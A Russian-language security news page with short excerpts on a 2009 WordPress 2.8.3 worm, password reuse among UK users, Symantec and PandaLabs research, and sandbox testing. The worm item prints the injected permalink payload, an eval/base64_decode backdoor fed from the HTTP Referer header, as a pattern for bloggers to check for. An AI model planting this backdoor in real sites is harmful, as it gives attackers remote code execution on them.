Месяц назад стало известно о новой критической уязвимости в WordPress
2.8.3, позволяющей легко изменить администраторский пароль в удалённом
режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость.
Однако, как оказалось, далеко не все блогеры следят за обновлениями. В эти выходные разразилась настоящая эпидемия нового вируса,
поражающего блоги на движке WordPress 2.8.3 и более ранних версий в
ветке 2.8. Червь регистрируется в блоге, запускает вредоносный код через структуру
permalink и делает себя вторым админом, потом запускает скрипт для
стирания себя со страницы пользователей и начинает добавлять спам и
ссылки на вредоносный контент в архивные топики. Присутствие вредителя довольно сложно обнаружить сразу, тем более если
он ещё ничего не опубликовал. Для этого нужно проверить фид
permalinks/rss на присутствие следующего кода.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
...
Читать дальше »
|
Растущая активност, изобретательность разнообразных кибермошенников мало беспокоит
рядовых обитателей Интернета. На примере недавно проведённых исследований компанией СРР, для
защиты доступа к самым разным своим сайтам почти половина британских
пользователей использует один и тот же пароль. 46% интернет-пользователей Великобритании признались, что их аккаунты в
социальных сетях, банковских сервисах и онлайн магазинах защищены одним
и тем же паролем. Еще 8% использует на разных сайтах вариации на тему
все того же единственного исходного пароля. Очевидно, что не все сайты обеспечивают высокий уровень защиты от
фишинга, по этому однажды получив в свое распоряжение ваш пароль, мошенники смогут
проникнуть во все остальные аккаунты пользователя. Кроме того, в исследовании отмечается, любовь интернет-пользователей к
незатейливым и примитивным паролям. Хотя многие интернетчики перестали
использовать пароли вроде "123456" и "qwerty", все же разнообразием
секретные слова бри
...
Читать дальше »
|
Компания Symantec, занимающаяся
разработкой ПО в области компьютерной безопасности, опубликовала
результаты исследования, насколько ответственно пользователи Сети
относятся к своей безопасности.
Как оказалось, две трети опрошенных
загружали свои фотографии в интернет, 79% оставляли свой домашний адрес
и почти половина участников исследования вводили номер своего
мобильного телефона на различных веб-сайтах. Подобную информацию Symantec окрестила
термином «цифровая татуировка» — дело в том, что чаще всего личные
данные, оставляемые в сети, удалить нельзя, а через поисковики их могут
найти н
...
Читать дальше »
|
Технология Sandbox («песочницы»
или Green Zone — «безопасной среды»), впервые появившаяся в комплексном
решении Kaspersky Internet Security 2010 (антивирус, антиспам, защита
от атак), привлекла пристальное внимание конкурентов ЛК. Напомним, что
Sandbox позволяет запускать подозрительные программы и веб-сайты в
изолированном виртуальном пространстве. «Мы не
могли удержаться от тестирования новой технологии наших коллег, —
говорят представители компании . «Доктор Веб». — Поскольку идея
«песочниц» не нова и довольно много антивирусных компаний уже долгое время имеют схожие разработки, а также в связи с тем, что наша антивирусная
лаборатория постоянно ведет исследования в этой области, подобная
информация, естественно, представляет для нас большой интерес».
«Для выполнения первого теста файловый
менеджер FAR был помещен в «песочни
...
Читать дальше »
|
Лаборатория опубликовала отчет
о ситуации с вредоносными программами за первый квартал 2009 года.
Согласно отчету, за первый квартал 2009 года доля троянов среди
вредоносных программ составила 73%. Тем не менее, одной из главных
тенденций, отмеченных в отчете, является рост количества
программ-шпионов, доля которых за первые три месяца нынешнего года
увеличилась с 2,5% (данные по четвертому кварталу 2008 года) до 13,15%.
“За
первый квартал 2009 года мы наблюдали существенный рост общего
количества программ-шпионов, целью которых, возможно, является
«загрузка» антивирусных лабораторий и дальнейшее заражение огромного
количества пользователей”, - говорит Луис Корронс, Технический директор
PandaLabs.
В некоторых случаях, кибер-преступники были успешны,
как, например, в случае со шпионской программой Virtumonde, которая
заразила больше компьютеров, чем любой другой вредоносный код в первом
квартале 2009 года. Эта вредоносная пр
...
Читать дальше »
| |